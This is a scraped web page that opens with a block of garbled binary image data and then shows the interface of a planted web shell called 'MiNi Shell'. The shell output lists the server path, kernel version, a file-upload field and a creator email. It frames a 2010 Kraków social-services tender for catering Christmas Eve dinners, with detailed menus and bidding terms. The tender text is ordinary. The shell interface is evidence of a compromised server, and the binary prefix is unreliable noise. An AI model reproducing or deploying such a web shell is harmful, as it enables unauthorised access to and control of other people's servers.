JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101201/391928-N-2010.html

<p class="kh_header"><b>Kraków: Przygotowanie wieczerzy wigilijnych dla klientów MOPS w Krakowie</b><br>
<b>Numer ogłoszenia: 391928 - 2010; data zamieszczenia: 01.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie wieczerzy wigilijnych dla klientów MOPS w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem I części zamówienia jest zorganizowanie spotkania rozwijającego kompetencje społeczne dla 50 beneficjentów projektu pn.: Streetwork - skuteczny kontakt oraz 10 pracowników zespołu zadaniowego Streetwork. Usługa obejmuje zorganizowanie spotkania wraz z usługą cateringową, zgodnie z poniższymi wytycznymi:
1)	Wykonawca zapewni całą salę lub wydzieloną część odpowiedniej wielkości, w lokalu na terenie Krakowa, z dogodnym dojazdem środkami komunikacji miejskiej, do której w czasie spotkania nie będą miały wstępu osoby postronne
2)	Wykonawca zapewni lokal wyposażony w co najmniej:
a)	6 stołów bilardowych, 
b)	2 tory do gry w kręgle,
c)	2 stoły do gry w piłkarzyki.
3)	Usługa obejmuje również przygotowanie, dostarczenie i serwowanie w czasie trwania spotkania wigilijnego posiłków w formie ciepłego obiadu oraz ogólnodostępnego stołu szwedzkiego, wg następującego menu dla 1 osoby:
Obiad - danie główne (serwowane):
a)	barszcz czerwony (350ml) z uszkami grzybowymi (40g),
b)	pstrąg smażony na maśle z ziołami (150g),
c)	ziemniaki z wody, posypane koperkiem (200g),
d)	zestaw surówek, trzy rodzaje (330g),
e)	kutia (100g),
f)	kompot z suszonych owoców (250ml),
Szwedzki stół:
a)	śledź po kaszubsku (60g),
b)	rarytas śledziowy (60g),
c)	sałatka Salsa (150g),
d)	sałatka jarzynowa (150g),
e)	pierogi ruskie (150g),
f)	pierogi z kapustą i grzybami (150g),
g)	kapusta z grochem (330g),
h)	ciasto, 3 rodzaje: piernik staropolski z bakaliami, sernik, strucla z makiem (350g),
i)	napoje gorące typu kawa, herbata, cukier, mleko do kawy - bez ograniczeń,
j)	napoje zimne, gazowane typu Pepsi/CocaCola, soki owocowe 100 %, woda mineralna niegazowana, (1000 ml),
k)	porcja  pieczywa wiejskiego lub mieszanego (200 g.)
l)	owoce cytrusowe, banany (500g),
4)	Wykonawca zapewni ponadto ceramiczną zastawę stołową, świąteczny wystrój sali tj.: na stołach białe obrusy, świece wraz ze stroikiem świątecznym, z siankiem i opłatkiem, odpowiednią oprawę muzyczną i obsługę kelnerską w trakcie spotkania.
2.	Przedmiotem II części zamówienia jest organizacja spotkania wigilijnego, zgodnie z poniższymi wytycznymi:
1)	Menu:
a)	grochówka, 1 porcja 350 g. - 750 porcji,
b)	bigos, 1 porcja 350 g. - 500 porcji,
c)	chleb - porcja 150 g . - 1250 porcji  
2)	Miejsce realizacji: Al. Róż w pobliżu Placu Centralnego w Krakowie
3)	Wykonawca zapewni:
a)	dziewięć namiotów (4 szt. - wym. 4 m x 2 m oraz 5 szt. - wym. 4 m x 6 m),
b)	nadmuch ciepłego powietrza do jednego namiotu o wym. 4 m x 6 m,
c)	ławy i stoły (miejsca siedzące umożliwiające spożycie ciepłych posiłków w jednym czasie przez 150 osób).
d)	transport posiłków na miejsce realizacji przedmiotu zamówienia,
e)	obsługę w miejscu realizacji zamówienia.
4)	Dostęp do energii elektrycznej oraz zgodę na zajęcia pasa drogowego zapewnia Zamawiający.
3.	Przedmiotem III części zamówienia jest organizacja spotkania wigilijnego, zgodnie z poniższymi wytycznymi:
1)	Usługa obejmuje: organizacje wieczerzy wigilijnej dla 80 osób oraz przygotowanie dla 20 osób posiłków na wynos z dowozem do miejsca zamieszkania klientów (teren Dzielnicy VIII Miasta Krakowa)
2)	Wykonawca zapewni:
a)	salę odpowiedniej wielkości, w lokalu na terenie Dzielnicy VIII Miasta Krakowa, z dogodnym dojazdem środkami komunikacji miejskiej, do której w czasie trwania spotkania nie będą miały wstępu osoby postronne
b)	wystrój sali - stosownie do okoliczności: na stołach białe obrusy, świece wraz ze stroikiem świątecznym, z siankiem i opłatkiem oraz z zastawą ceramiczną. 
c)	obsługę kelnerską i odpowiednią oprawę muzyczną - kolędy. 
3)	Menu dla 1 osoby:
Spotkanie wigilijne w lokalu
a)	żurek z grzybami i jajkiem (300ml)
b)	karp smażony z pieczarkami (180g)
c)	ziemniaki z wody posypane koperkiem (200g) 
d)	kapusta czerwona (120g)
e)	pierogi ruskie (330g)
f)	kompot z suszonych owoców (250ml)
g)	kawa lub herbata (250ml)
h)	cukier (10g)
i)	mleko (30ml)
j)	sernik (150g)
k)	kosze pieczywa wiejskiego - bez ograniczeń
l)	na wynos dla każdego uczestnika kapusta z grochem (330g)
Menu na wynos z dowozem 
a)	karp smażony z pieczarkami (180g)
b)		ziemniaki z wody posypane koperkiem (200g)
c)		kapusta czerwona (120g)
d)		pierogi ruskie (330g)
e)		sernik (150g)
f)		kapusta z grochem (330g)
4.	Przedmiotem IV części zamówienia jest organizacja spotkania wigilijnego dla 110 osób, zgodnie z poniższymi wytycznymi:
1)	Wykonawca zapewni:
a)	transport posiłków do miejsca realizacji usługi, 
b)	wystrój sali - stosownie do okoliczności: na stołach białe obrusy, świece wraz ze stroikiem świątecznym, z siankiem i opłatkiem oraz z zastawą ceramiczną. 
c)	odpowiednią oprawę muzyczną - kolędy. 
d)	obsługę w miejscu realizacji zamówienia.
2)	Wykonawca przygotuje i dostarczy posiłki w następującej ilości:
a)	lokal na os. Na Stoku 50 - 50 posiłków
b)	lokal na przy ul. Wańkowicza 17 - 60 posiłków.
3)	Lokale, o których mowa w pkt 2 zapewnia Zamawiający.
4)	Menu dla 1 osoby:
a)	Zupa krem grzybowy z łazankami domowymi 500 ml
b)	Filet  rybny panierowany 150 g
c)	Surówka z kapusty kiszonej z jabłuszkiem, cebulką i marchewką 150 g
d)	Pieczywo krojone 150 g
e)	Pierogi z kapustą i grzybami 6 szt
f)	Ryba w salsie 80 g
g)	Tagiatelle z makiem i bakaliami 100 g
h)	Kompot z suszu 200ml
i)	Kawa lub herbata, Cukier bez ograniczeń
j)	Ciasto ( piernik świąteczny, strucla makowa, ciasteczka  kruche)250g
5.	Wykonawca zapewni właściwą jakość przygotowywanych posiłków z uwzględnieniem wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz przepisów ustawy o Państwowej Inspekcji Sanitarnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających  stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.52.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, warunki płatności oraz miejsce realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?dok_id=27000<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Józefińska 14, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 09:30, miejsce: Dziennik podawczy MOPS w Krakowie, ul. Józefińska 14,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I część zamówienia jest finansowana ze środków UE w ramach projektu Streetwork- skuteczny kontakt

Szczegółowy termin realizacji zamówienia:
1)	I część zamówienia: w okresie od dnia podpisania umowy do 21.12.2010 r. w godzinach od 16.00 do 20.00. Konkretną datę spotkania Wykonawca ustali w Koordynatorem Zespołu Zadaniowego Streetwork z co najmniej 3-dniowym wyprzedzeniem.  
2)	II część zamówienia: 18.12.2010 r. w godz. 11:00 - 14:00
3)	III część zamówienia: 20.12.2010 w godz.12:00-15:00
4)	IV część zamówienia: 13.12.2010. Wykonawca dostarczy i wyda posiłki w lokalu na os. Na Stoku 50 w godz. 14:00-16:00. oraz w lokalu przy ul. Wańkowicza 17 w godz. 15:30-17:00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com